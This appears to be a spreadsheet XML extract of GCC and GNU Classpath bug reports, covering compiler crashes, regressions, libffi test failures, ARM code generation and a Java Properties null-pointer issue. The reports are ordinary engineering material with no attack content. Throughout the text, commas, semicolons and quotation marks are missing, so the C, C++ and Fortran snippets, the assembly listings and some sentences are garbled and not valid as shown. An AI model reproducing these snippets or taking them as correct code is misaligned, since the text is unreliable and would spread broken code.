    The maximum number of instructions to duplicate to a block that jumps to a computed goto. To avoid O(N^2) behavior in a number of passes GCC factors computed gotos early in the compilation process and unfactors them as late as possible. Only computed jumps at the end of a basic blocks with no more than max-goto-duplication-insns are unfactored. The default value is 8. 
Since .L1125 and basic block 66 have only a single instruction the computed goto should have been unfactored.
$ gcc-4.4 -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /home/dnovillo/perf/sbox/gcc/local.x86_64/src/configure --prefix=/home/dnovillo/perf/sbox/gcc/local.x86_64/inst --srcdir=/home/dnovillo/perf/sbox/gcc/local.x86_64/src --with-gmp=/home/dnovillo/i686 --with-mpfr=/home/dnovillo/i686 --build=i686-pc-linux-gnu --enable-languages=c++fortranobjcobj-c++
Thread model: posix
gcc version 4.4.0 20090223 (experimental) (GCC)</t>
  </si>
  <si>
    <t>CLASSPATH-22994</t>
  </si>
  <si>
    <t>Possible NPE in java.util.Properties</t>
  </si>
  <si>
    <t xml:space="preserve">In classpath-0.15:
In java.util.Properties load(InputStream) method at
line 215 a value returned from BufferedReader.readLine()
is dereferenced without being checked to see if it is null.
This part of the code is handling line continuations.
This suggests that loading properties from a file which ends
with a backslash character will result in a null pointer
exception.
Found by FindBugs http://findbugs.sourceforge.net
</t>
  </si>
  <si>
    <t>GCC-40701</t>
  </si>
  <si>
    <t>[4.5/4.6 regression] Many libffi tests fail to compile on Tru64 UNIX</t>
  </si>
  <si>
    <t>Between 20090522 and 20090612 many libffi tests started to fail on alpha-dec-osf4.0f:
FAIL: libffi.call/closure_fn0.c -O0 -W -Wall (test for excess errors)
Excess errors:
In file included from /vol/gcc/src/gcc-dist/libffi/testsuite/libffi.call/closure_fn0.c:13:0:
/vol/gcc/src/gcc-dist/libffi/testsuite/libffi.call/ffitest.h:6:22: fatal error: inttypes.h: No such file or directory
compilation terminated.
WARNING: libffi.call/closure_fn0.c -O0 -W -Wall compilation failed to produce executable
It is clearly wrong to unconditionally use .  One might consider
using  for in-tree use which is now always provided by GCC but this
would be wrong for the external libffi either.
alpha-dec-osf5.1b is not that heavily affected since it has  but
that one unfortunately lacks PRIuPTR:
FAIL: libffi.call/cls_align_pointer.c -O0 -W -Wall (test for excess errors)
Excess errors:
/vol/gcc/src/gcc-dist/libffi/testsuite/libffi.call/cls_align_pointer.c: In function 'cls_struct_align_fn':
/vol/gcc/src/gcc-dist/libffi/testsuite/libffi.call/cls_align_pointer.c:25:17: error: expected ')' before 'PRIuPTR'
/vol/gcc/src/gcc-dist/libffi/testsuite/libffi.call/cls_align_pointer.c:29:3: warning: too few arguments for format
/vol/gcc/src/gcc-dist/libffi/testsuite/libffi.call/cls_align_pointer.c: In function 'main':
/vol/gcc/src/gcc-dist/libffi/testsuite/libffi.call/cls_align_pointer.c:84:22: error: expected ')' before 'PRIuPTR'
/vol/gcc/src/gcc-dist/libffi/testsuite/libffi.call/cls_align_pointer.c:84:22: warning: too few arguments for format
/vol/gcc/src/gcc-dist/libffi/testsuite/libffi.call/cls_align_pointer.c:91:22: error: expected ')' before 'PRIuPTR'
/vol/gcc/src/gcc-dist/libffi/testsuite/libffi.call/cls_align_pointer.c:91:22: warning: too few arguments for format
WARNING: libffi.call/cls_align_pointer.c -O0 -W -Wall compilation failed to produce executable
The definition of PRIuPTR in intl/loadmsgcat.c might be an option here.</t>
  </si>
  <si>
    <t>GCC-44953</t>
  </si>
  <si>
    <t>FAIL: gfortran.dg/char4_iunit_1.f03  *  execution test</t>
  </si>
  <si>
    <t>gfortran.dg/char4_iunit_1.f03 fails on powerpc-apple-darwin9 (see
http://gcc.gnu.org/ml/gcc-testresults/2010-07/msg01445.html ). 
It looks like an endianess issue.</t>
  </si>
  <si>
    <t>GCC-10790</t>
  </si>
  <si>
    <t>g++/gcc</t>
  </si>
  <si>
    <t xml:space="preserve">From: Andrew Pinski 
To: lgang@yahoo.com Gcc-Bugs@Gcc. Gnu. Org 
Cc: Andrew Pinski  gcc-gnats@gcc.gnu.org
Subject: Re: c++/10790: g++/gcc
Date: Wed 14 May 2003 15:09:40 -0400
 This is a GCC extension so it is not a bug use -pedantic or 
 -pedantic-errors to see that they are not accepted.
 I get some warnings or errors if -pedantic-errors:
 test2.cc: In function `int main()':
 test2.cc:7: warning: ISO C++ forbids variable-size array `arr'
 test2.cc:9: warning: ISO C++ forbids variable-size array `arr2'
 Thanks
 Andrew Pinski
 PS can someone close this bug as it is not really a bug but a 
 misunderstanding of GCC extensions.
 On Wednesday May 14 2003 at 13:59 US/Eastern lgang@yahoo.com wrote:
 &gt;
 &gt;&gt; Number:         10790
 &gt;&gt; Category:       c++
 &gt;&gt; Synopsis:       g++/gcc
 &gt;&gt; Confidential:   no
 &gt;&gt; Severity:       serious
 &gt;&gt; Priority:       medium
 &gt;&gt; Responsible:    unassigned
 &gt;&gt; State:          open
 &gt;&gt; Class:          sw-bug
 &gt;&gt; Submitter-Id:   net
 &gt;&gt; Arrival-Date:   Wed May 14 18:06:00 UTC 2003
 &gt;&gt; Closed-Date:
 &gt;&gt; Last-Modified:
 &gt;&gt; Originator:     lgang@yahoo.com
 &gt;&gt; Release:        G++ 3.2
 &gt;&gt; Organization:
 &gt;&gt; Environment:
 &gt; Solaris 8
 &gt;&gt; Description:
 &gt; Should a non-constant array be allowed in C/C++? I guess not.  See the 
 &gt; following code.
 &gt;
 &gt; int main()
 &gt; {
 &gt;   int c
 &gt;   scanf(%d 
 &gt;   int arr[c]
 &gt;   int p
 &gt;   char arr2[c]
 &gt;   int another
 &gt;   printf (Terrible diff=%d diff=%d\n
 &gt; 			 (char*)
 &gt;   return 0
 &gt; }
 &gt;
 &gt; Seems that compiler treats it int arr[c] as int *arr.  I don't think 
 &gt; it should compile.
 &gt;
 &gt; Thanks
 &gt;&gt; How-To-Repeat:
 &gt;
 &gt;&gt; Fix:
 &gt;
 &gt;&gt; Release-Note:
 &gt;&gt; Audit-Trail:
 &gt;&gt; Unformatted:
 &gt;
 &gt;
</t>
  </si>
  <si>
    <t>lgang</t>
  </si>
  <si>
    <t>GCC-3933</t>
  </si>
  <si>
    <t>compiler borks on expression with export in it</t>
  </si>
  <si>
    <t>gcc appears to swallow 'export' regardless of
whether it is part of an expression or declaration.
compiler output:
3: warning: keyword 'export' not implemented and will be ignored
3: parse error before =
Release:
gcc 2.95.2
Environment:
sparc-sun-solaris2.6
How-To-Repeat:
/*
Say a C struct with a field named export.
Or ...
*/
extern C { struct X { int export } }
void f() { X x x.export = 1 }</t>
  </si>
  <si>
    <t>fwai</t>
  </si>
  <si>
    <t>GCC-13042</t>
  </si>
  <si>
    <t>Invalid lex option and lex error building treelang under hpux11</t>
  </si>
  <si>
    <t>lex  -o/xxx/gnu/gcc-3.3/objdir/gcc/treelang/lex.c ../../gcc/gcc/treelang/lex.l
 line 0: warning 1: Unknown option o/xxx/gnu/gcc-3.3/objdir/gcc/treelang/lex.c
 line 0: warning 1: Unknown option /xxx/gnu/gcc-3.3/objdir/gcc/treelang/lex.c
 line 0: warning 1: Unknown option xxx/gnu/gcc-3.3/objdir/gcc/treelang/lex.c
 line 0: warning 1: Unknown option xx/gnu/gcc-3.3/objdir/gcc/treelang/lex.c
 line 0: warning 1: Unknown option x/gnu/gcc-3.3/objdir/gcc/treelang/lex.c
 line 0: warning 1: Unknown option /gnu/gcc-3.3/objdir/gcc/treelang/lex.c
 line 0: warning 1: Unknown option gnu/gcc-3.3/objdir/gcc/treelang/lex.c
 line 0: warning 1: Unknown option u/gcc-3.3/objdir/gcc/treelang/lex.c
 line 0: warning 1: Unknown option /gcc-3.3/objdir/gcc/treelang/lex.c
 line 0: warning 1: Unknown option gcc-3.3/objdir/gcc/treelang/lex.c
../../gcc/gcc/treelang/lex.l line 85: warning 22: Executable statements should
 occur right after %%
../../gcc/gcc/treelang/lex.l line 91: warning 22: Executable statements should
 occur right after %%
../../gcc/gcc/treelang/lex.l line 96: warning 22: Executable statements should
 occur right after %%
../../gcc/gcc/treelang/lex.l line 101: warning 22: Executable statements shoul
d occur right after %%
../../gcc/gcc/treelang/lex.l line 106: warning 22: Executable statements shoul
d occur right after %%
../../gcc/gcc/treelang/lex.l line 111: warning 22: Executable statements shoul
...
../../gcc/gcc/treelang/lex.l line 212: warning 22: Executable statements shoul
d occur right after %%
../../gcc/gcc/treelang/lex.l line 287: error 50: output table overflow try us
ing %o num
Possibly flex should be used instead.</t>
  </si>
  <si>
    <t>GCC-58335</t>
  </si>
  <si>
    <t>S/390: reload vs lra regression - testcase builtin-in-setjmp</t>
  </si>
  <si>
    <t>The following testcase fails when compiling with LRA enabled and succeeds without LRA:
FAIL: gcc.c-torture/execute/built-in-setjmp.c execution  -O1
main:
.LFB1:
	.loc 1 16 0
	stmg	%r6%r1548(%r15)
.LCFI2:
	larl	%r13.L13
	lgr	%r14%r15
	aghi	%r15-240
.LCFI3:
	aghi	%r14-64
	std	%f80(%r14)
	std	%f108(%r14)
	std	%f1216(%r14)
	std	%f1424(%r14)
	std	%f932(%r14)
	std	%f1140(%r14)
	std	%f1348(%r14)
	std	%f1556(%r14)
	lgr	%r11%r15
.LCFI4:
	.loc 1 17 0
	aghi	%r15-32
	lgr	%r2%r15
	aghi	%r2160
	stg	%r2160(%r11)
.LVL0:
	.loc 1 19 0
	larl	%r1.LC1
	mvc	0(5%r2)0(%r1)
	.loc 1 21 0
	larl	%r1buf
	la	%r3176(%r11)       176+r11 is stored as framepointer
	stg	%r30(%r1)
	larl	%r3.L4
	stg	%r38(%r1)
	stg	%r1524(%r1)
	stg	%r1332(%r1)
	lhi	%r10
	.loc 1 23 0
	stg	%r2168(%r11)
	j	.L5
.LVL1:
.L4:
	.loc 1 21 0
	lghi	%r1-160
	la	%r110(%r1%r11)    When restoring r11 only 160 is subtracted
	lhi	%r11
.L5:
	.loc 1 21 0 is_stmt 0 discriminator 4
	ltr	%r1%r1
	je	.L6
	.loc 1 23 0 is_stmt 1
	lhi	%r00
	larl	%r1.LC1
	lg	%r2168(%r11)       Wrong value loaded here
	clst	%r1%r2             segfault here
During LRA the elimination offset for r34 %fp to r11 changes from 160 to 176. The first insn gets the update but not the second.  From a first glance the reason appears to be that the insn for lghi %r1-160 it self is generated by a reload using a pseudo register which equals -160. This register does not seem to get the update after the offset changed.</t>
  </si>
  <si>
    <t>GCC-1393</t>
  </si>
  <si>
    <t>-CLASSPATH and -classpath options not recognised</t>
  </si>
  <si>
    <t xml:space="preserve">Responsible-Changed-From-To: apbianco-&gt;tromey
Responsible-Changed-Why: I fixed it
</t>
  </si>
  <si>
    <t>GCC-10020</t>
  </si>
  <si>
    <t>Can't bootstrap gcc on AIX with Ada enabled</t>
  </si>
  <si>
    <t>Syntax error in line 136 of gcc/ada/link.c : cnonst instead of const
Release:
gcc version 3.2.2
Environment:
OS : IBM AIX 5.1.0
ARCH : RS6000</t>
  </si>
  <si>
    <t>laurent.goujon</t>
  </si>
  <si>
    <t>GCC-41626</t>
  </si>
  <si>
    <t>[4.5 Regression] GCC does not bootstrap on powerpc64</t>
  </si>
  <si>
    <t>GCC does not bootstrap on powerpc64.  It fails in the 2nd stage when it links build/gensupport.o.  On the powerpc the statements:
static struct obstack obstack
struct obstack *rtl_obstack = 
On the powerpc generate a reference to an unknown external 'obstack' while on the x86_64 it generates 'obstack' as a bss item.  The option -fkeep-static-consts does not help the issue.</t>
  </si>
  <si>
    <t>GCC-61420</t>
  </si>
  <si>
    <t>[5/6/7 Regression] [OOP] type-bound procedure returning a procedure pointer fails to compile</t>
  </si>
  <si>
    <t>Created attachment 32894
defines type bound procedure that returns a procedure pointer
I was writing some sample code that defines a function that returns a pointer procedure. 
When I compile the code with Intel Ifort.14.x/15.x it complains saying that this exact feature is not supported.
When I compile with GNU gfortran49 it compiles and runs fine. But when I insert the statement 'implicit none' at the beginning of the code the code fails to compile. If I then use an implicit procedure pointer interface it again runs fine. 
I include the code as an attachment</t>
  </si>
  <si>
    <t>robert.rosenberg</t>
  </si>
  <si>
    <t>CLASSPATH-26166</t>
  </si>
  <si>
    <t>Matcher.find mis-behaviour</t>
  </si>
  <si>
    <t>Eclipse's hippie completion (similar to word completion in vim or Emacs) does not work in Fedora due to a bug in our regular expression code.  I believe this is a GNU Classpath regex issue.  I have made a test case (soon to be attached).
javac TestHippieRegex.java
java TestHippieRegex
With the Sun JVM I get the following:
++++++++++++++ trying fFindReplaceMatcher.find(100)
fFindReplaceMatcher.pattern().pattern() = [\p{L}[\p{Mn}[\p{Pc}[\p{Nd}[\p{Nl}[\p{Sc}]]]]]]+
++++++++++++++ found =  true
but with gij (Fedora rawhide's 4.1.0-0.20) I get:
++++++++++++++ trying fFindReplaceMatcher.find(100)
fFindReplaceMatcher.pattern().pattern() = [\p{L}[\p{Mn}[\p{Pc}[\p{Nd}[\p{Nl}[\p{Sc}]]]]]]+
++++++++++++++ found =  false
I'm investigating this because of https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=178648</t>
  </si>
  <si>
    <t>GCC-48126</t>
  </si>
  <si>
    <t>arm_output_sync_loop: misplaced memory barrier</t>
  </si>
  <si>
    <t>Created attachment 23656
Patch alters DMB placement and adds CLREXNE
The ARMv6+ implementation of __sync_*_compare_and_swap branches on a failed compare.  There are two (theoretical as I understand it) flaws in this branch path.  One it skips past the memory barrier at the end of the critical region which could cause memory accesses to get speculated in.  Two it doesn't perform a clrex (or for older armv6 a dummy strex) to clear the local monitor.  This may not be a practical problem in most userland code but it's at least not technically correct according to ARM docs and it interferes with auditing locking code using valgrind/qemu/etc.
The attached patch fixes these two issues for ARMv7-a / Thumb2 targets.  However the clrexne part of it is not correct for older ARMv6 variants which lack clrex or the ability to add a conditional on it (or for assemblers which can't handle the Thumb2 it opcode when assembling for ARM).</t>
  </si>
  <si>
    <t>m.k.edwards</t>
  </si>
  <si>
    <t>CLASSPATH-20782</t>
  </si>
  <si>
    <t>jawt assertion failure</t>
  </si>
  <si>
    <t>GCC-31992</t>
  </si>
  <si>
    <t>[4.1 regression] ICE initializing static variable of template class</t>
  </si>
  <si>
    <t>The following valid code snippet triggers a segfault since GCC 4.1.2:
=============================================
template struct A
{
    static const int i
}
template const int A::i( A::i )
=============================================
bug.cc:6: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-491</t>
  </si>
  <si>
    <t>[ARM 2.95] unrecognizable insn with -march=armv4</t>
  </si>
  <si>
    <t>report is being submitted to debian-bugs as well.  this error occured during
a build of sendmail-8.9.3 on the netwinder.  
the build which caused the error was the sendmail source package from 
debian potato (slink and woody fail as well).
the attached file is a gziped copy of the domain.c file which is causing the 
error. 
cc -O2 -I. -I/usr/include/db2 -DNEWDB -DNIS -DMAP_REGEX -DHASFLOCK=1 -DTCPWRAPPE
RS=1 -D_FFR_MAX_MIME_HEADER_LENGTH=1 -D_FFR_MAX_HEADERS_LENGTH=1 -D_PATH_SENDMAI
LCF=\/etc/mail/sendmail.cf\ -include ../../debian/el33t.h -DCMDDIR=\/usr/lib/
sm.bin\ -DPATH=\/usr/bin:/bin\ -D_PATH_SENDMAIL=\/usr/sbin/sendmail\   -c -
o domain.o domain.c
domain.c: In function `getmxrr':
domain.c:380: internal error--unrecognizable insn:
(insn 1818 1817 319 (set (reg:SI 4 r4)
        (umin:SI (reg/v:SI 4 r4)
            (const_int 8192 [0x2000]))) -1 (nil)
    (nil))
make[2]: *** [domain.o] Error 1
Release:
2.95.2 (debian rev 13)
Environment:
armv4l (rebel.com netwinder)
How-To-Repeat:
attempt to build sendmail with gcc-2.9.5.2-13.  
ssh access to affected machine can be granted if needed.</t>
  </si>
  <si>
    <t>GCC-69314</t>
  </si>
  <si>
    <t>Use of uninitialised value in libbacktrace/pecoff.c</t>
  </si>
  <si>
    <t>In coff_add() str_size is declared as a size_t but if there is a symbol table only 4 bytes of it are initialised:
memcpy (
str_size should probably be declared as a uint32_t.
The bug at https://github.com/rust-lang/rust/issues/28447 was caused by this.
It was fixed in Rust local copy of libbacktrace: https://github.com/rust-lang/rust/commit/55e2b7e1b4606ae0bc684293f011b7006d1f1258</t>
  </si>
  <si>
    <t>GCC-38140</t>
  </si>
  <si>
    <t>[4.4 Regression] ice for C code with -O2</t>
  </si>
  <si>
    <t>I just tried to compile Suse Linux package opensc-0.11.6-4.5
with the GNU gcc version 4.4.0 snapshot 20081114
It said
asn1.c: In function 'asn1_decode':
asn1.c:1148: internal compiler error: in gimple_call_return_type at gimple.h:1993
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-49923</t>
  </si>
  <si>
    <t>__attribute__((packed)) on ARM is sometimes dropped</t>
  </si>
  <si>
    <t>tst2.c fails with an alignment related problem.
With static on line 33 the code generated is this :
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
unsigned int aostk_font_strwidth(const struct aostk_font* font const char*
str) {
        const struct aostk_glyph* g = aostk_get_glyph(font 0)
        return g-&gt;advance.x
   0:   e5903003        ldr     r3 [r0 #3]
}
   4:   e5d30005        ldrb    r0 [r3 #5]
   8:   e12fff1e        bx      lr
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
The first ldr-instruction is wrong afaik since struct aostk_font is packed.
Removing static fomr line 33 gives this code :
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
const struct aostk_glyph* aostk_get_glyph(const struct aostk_font* f unsigned
int c) {
        return 
   0:   e5d02004        ldrb    r2 [r0 #4]
   4:   e5d03003        ldrb    r3 [r0 #3]
   8:   e1833402        orr     r3 r3 r2 lsl #8
   c:   e5d02005        ldrb    r2 [r0 #5]
  10:   e5d00006        ldrb    r0 [r0 #6]
  14:   e1833802        orr     r3 r3 r2 lsl #16
}
  18:   e1830c00        orr     r0 r3 r0 lsl #24
  1c:   e12fff1e        bx      lr
00000020 :
        const struct aostk_glyph* glyphs
}
const struct aostk_glyph* aostk_get_glyph(const struct aostk_font* f unsigned
int c) {
        return 
  20:   e5d02004        ldrb    r2 [r0 #4]
  24:   e5d03003        ldrb    r3 [r0 #3]
  28:   e1833402        orr     r3 r3 r2 lsl #8
  2c:   e5d02005        ldrb    r2 [r0 #5]
  30:   e1833802        orr     r3 r3 r2 lsl #16
  34:   e5d02006        ldrb    r2 [r0 #6]
  38:   e1833c02        orr     r3 r3 r2 lsl #24
unsigned int aostk_font_strwidth(const struct aostk_font* font const char*
str) {
        const struct aostk_glyph* g = aostk_get_glyph(font 0)
        return g-&gt;advance.x
}
  3c:   e5d30005        ldrb    r0 [r3 #5]
  40:   e12fff1e        bx      lr
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
Notice in aostk_get_glyph that the ldrb-instructions are used instead of ldr.
I compile using -Os Compiling with -O0 generates correct code. Compiling with -fno-tree-sra also generates wrong code.
I have bisected the problem and to this commit:
Author: jamborm 
Date:   Thu Sep 9 23:28:27 2010 +0000
    2010-09-10  Martin Jambor  
        PR tree-optimization/44972                                                                                                                                                                        
        * ipa-prop.c (ipa_modify_call_arguments): Build MEM_REF instead of                                                                                                                                
        calling build_ref_for_offset.
        * testsuite/g++.dg/torture/pr34850.C: Remove expected warning.
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@164135 138bc75d-0d04-0410-961f-82ee72b054a4</t>
  </si>
  <si>
    <t>sgh</t>
  </si>
  <si>
    <t>GCC-57401</t>
  </si>
  <si>
    <t>'Conflicting declaration' involving using declaration and dependent name</t>
  </si>
  <si>
    <t>Using 4.9.0 20130509 (experimental) [trunk revision 198734] with flags -std=c++11:
$ cat main.cpp 
struct base {
    using base_type = base
    using type = int
}
template
struct derived: T {
    using typename derived::base_type::type
    // Uses of once dependent type explicitly introduced
    // into scope by using declaration above -- no complaints
    type foo(type)
    // No complaints as well
    static type t
}
// Error: conflicting declaration
template
typename derived::type derived::t = 0
int main()
{}
//-------------------
$ g++-snapshot -std=c++11 main.cpp 
main.cpp:20:39: error: conflicting declaration 'typename derived::type derived::t'
 typename derived::type derived::t = 0
                                       ^
main.cpp:15:17: error: 'derived::t' has a previous declaration as 'typename derived::base_type::type derived::t'
     static type t
                 ^
main.cpp:20:39: error: declaration of 'typename derived::base_type::type derived::t' outside of class is not definition [-fpermissive]
 typename derived::type derived::t = 0
                                       ^
I suspect the code is wrongly rejected as demonstrated by the other uses of type as if it weren't a dependent type anymore. (Admittedly writing a definition of foo that matches the declaration can be troublesome but I assume this is the same issue in another form.) If it is any indication Clang accepts the code.</t>
  </si>
  <si>
    <t>GCC-42713</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE - segfault in tsubst</t>
  </si>
  <si>
    <t>seen with trunk 20100112:
$ g++ -c ../DemonsRegistration.ii 
In file included from /scratch/packages/tmp/rebuild/slicer-3.4.0~svn10438/Applications/CLI/DiffeomorphicDemonsRegistration/itkGridForwardWarpImageFilter.h:120:0
                 from /scratch/packages/tmp/rebuild/slicer-3.4.0~svn10438/Applications/CLI/DiffeomorphicDemonsRegistration/DemonsRegistration.cxx:48:
/scratch/packages/tmp/rebuild/slicer-3.4.0~svn10438/Applications/CLI/DiffeomorphicDemonsRegistration/itkGridForwardWarpImageFilter.txx: In constructor 'itk::GridForwardWarpImageFilter::GridForwardWarpImageFilter() [with TDeformationField = itk::Image 3u&gt; TOutputImage = itk::Image]':
/scratch/packages/tmp/rebuild/slicer-3.4.0~svn10438/Applications/CLI/DiffeomorphicDemonsRegistration/itkGridForwardWarpImageFilter.h:49:125:   instantiated from 'static itk::GridForwardWarpImageFilter::Pointer itk::GridForwardWarpImageFilter::New() [with TDeformationField = itk::Image 3u&gt; TOutputImage = itk::Image itk::GridForwardWarpImageFilter::Pointer = itk::SmartPointer 3u&gt; itk::Image &gt; &gt;]'
/scratch/packages/tmp/rebuild/slicer-3.4.0~svn10438/Applications/CLI/DiffeomorphicDemonsRegistration/DemonsRegistration.cxx:871:85:   instantiated from 'void::DoDemonsRegistration(::arguments) [with unsigned int Dimension = 3u]'
/scratch/packages/tmp/rebuild/slicer-3.4.0~svn10438/Applications/CLI/DiffeomorphicDemonsRegistration/DemonsRegistration.cxx:1018:35:   instantiated from here
/scratch/packages/tmp/rebuild/slicer-3.4.0~svn10438/Applications/CLI/DiffeomorphicDemonsRegistration/itkGridForwardWarpImageFilter.txx:23:3: internal compiler error: Segmentation fault
Please submit a full bug report
Program received signal SIGSEGV Segmentation fault.
0x00000000004d040b in tsubst (t=0x7fffee844bd0 args=0x7fffea07e210 complain=3 in_decl=0x7fffee347ac8) at ../../src/gcc/cp/pt.c:9870
9870                if (arg &amp;&amp; TREE_CODE (arg) == ARGUMENT_PACK_SELECT)
(gdb) p arg
$1 = (tree) 0x3
(gdb) bt
#0  0x00000000004d040b in tsubst (t=0x7fffee844bd0 args=0x7fffea07e210 complain=3 in_decl=0x7fffee347ac8) at ../../src/gcc/cp/pt.c:9870
#1  0x00000000004d3fdb in tsubst_template_args (t= args= complain= 
    in_decl=) at ../../src/gcc/cp/pt.c:8377
#2  0x00000000004d0de1 in tsubst (t=0x7fffee84de70 args=0x7fffea07e210 complain=3 in_decl=0x7fffee347ac8) at ../../src/gcc/cp/pt.c:9732
#3  0x00000000004d046f in tsubst (t=0x7fffee84f498 args=0x7fffea07e210 complain=3 in_decl=0x7fffee347ac8) at ../../src/gcc/cp/pt.c:10265
#4  0x00000000004d3fdb in tsubst_template_args (t= args= complain= 
    in_decl=) at ../../src/gcc/cp/pt.c:8377
#5  0x00000000004dab8b in tsubst_aggr_type (t=0x7fffee8bd888 args=0x7fffea07e210 complain=3 in_decl=0x7fffee347ac8 entering_scope=0)
    at ../../src/gcc/cp/pt.c:8543
#6  0x00000000004d4373 in tsubst_qualified_id (qualified_id=0x7fffee37ba80 args=0x7fffea07e210 complain=3 in_decl= 
    done= address_p=) at ../../src/gcc/cp/pt.c:10550
#7  0x00000000004d2241 in tsubst_copy_and_build (t=0x7fffee37ba80 args=0x7fffea07e210 complain=3 in_decl=0x7fffee347ac8 function_p=0 '\000' 
    integral_constant_expression_p=0 '\000') at ../../src/gcc/cp/pt.c:12001
#8  0x00000000004d234e in tsubst_copy_and_build (t=0x7fffee390040 args=0x7fffea07e210 complain=3 in_decl=0x7fffee347ac8 function_p=0 '\000' 
    integral_constant_expression_p=) at ../../src/gcc/cp/pt.c:12045
#9  0x00000000004cd891 in tsubst_expr (t=0x7fffee390040 args= complain=3 in_decl=0x7fffee347ac8 
    integral_constant_expression_p=) at ../../src/gcc/cp/pt.c:11747
#10 0x00000000004ce2b2 in tsubst_expr (t=0x7fffee38c930 args= complain=3 in_decl=0x7fffee347ac8 
    integral_constant_expression_p=) at ../../src/gcc/cp/pt.c:11346
#11 0x00000000004ce215 in tsubst_expr (t= args= complain=3 in_decl=0x7fffee347ac8 
    integral_constant_expression_p=) at ../../src/gcc/cp/pt.c:11332
#12 0x00000000004cd904 in tsubst_expr (t=0x7fffee37cac0 args= complain=3 in_decl=0x7fffee347ac8 
    integral_constant_expression_p=) at ../../src/gcc/cp/pt.c:11488
#13 0x00000000004ce215 in tsubst_expr (t= args= complain=3 in_decl=0x7fffee347ac8 
    integral_constant_expression_p=) at ../../src/gcc/cp/pt.c:11332
#14 0x00000000004cd904 in tsubst_expr (t=0x7fffee528f40 args= complain=3 in_decl=0x7fffee347ac8 
    integral_constant_expression_p=) at ../../src/gcc/cp/pt.c:11488
#15 0x00000000004dbe0f in instantiate_decl (d= defer_ok= expl_inst_class_mem_p=)
    at ../../src/gcc/cp/pt.c:16640
#16 0x00000000004df064 in instantiate_pending_templates (retries=) at ../../src/gcc/cp/pt.c:16737
#17 0x00000000004f2d15 in cp_write_global_declarations () at ../../src/gcc/cp/decl2.c:3511
#18 0x000000000079f3a6 in compile_file (argc=12 argv=0x7fffffffe5f8) at ../../src/gcc/toplev.c:1065
#19 do_compile (argc=12 argv=0x7fffffffe5f8) at ../../src/gcc/toplev.c:2405
#20 toplev_main (argc=12 argv=0x7fffffffe5f8) at ../../src/gcc/toplev.c:2447
#21 0x00007ffff616cabd in __libc_start_main () from /lib/libc.so.6
#22 0x000000000049f179 in _start ()</t>
  </si>
  <si>
    <t>GCC-77768</t>
  </si>
  <si>
    <t>[7 Regression] LTO/PGO -O3 bootstrap broken: tree-vrp.c:11053:0: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>on gcc-112 (ppc64le) during final LTO link of cc1/cc1plus:
../../gcc/gcc/tree-vrp.c: In member function â€˜executeâ€™:
../../gcc/gcc/tree-vrp.c:11053:0: internal compiler error: Segmentation fault
   virtual unsigned int execute (function *)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[4]: *** [/home/trippels/tmp/ccYNb8Te.ltrans10.ltrans.o] Error 1
Thread 2.1 lto1-ltrans received signal SIGSEGV Segmentation fault.
[Switching to process 103667]
0x0000000010f818d8 in visit_use(tree_node*) ()
(gdb) bt
#0  0x0000000010f818d8 in visit_use(tree_node*) ()
#1  0x0000000010f83790 in DFS(tree_node*) ()
#2  0x0000000010f84f6c in sccvn_dom_walker::before_dom_children(basic_block_def*) ()
#3  0x0000000011806c08 in dom_walker::walk(basic_block_def*) ()
#4  0x0000000010f7f1e4 in run_scc_vn(vn_lookup_kind) ()
#5  0x0000000010f3d654 in (anonymous namespace)::pass_pre::execute(function*) ()
#6  0x0000000010a4349c in execute_one_pass(opt_pass*) ()
#7  0x0000000010a446a0 in execute_pass_list_1(opt_pass*) ()
#8  0x0000000010a446dc in execute_pass_list_1(opt_pass*) ()
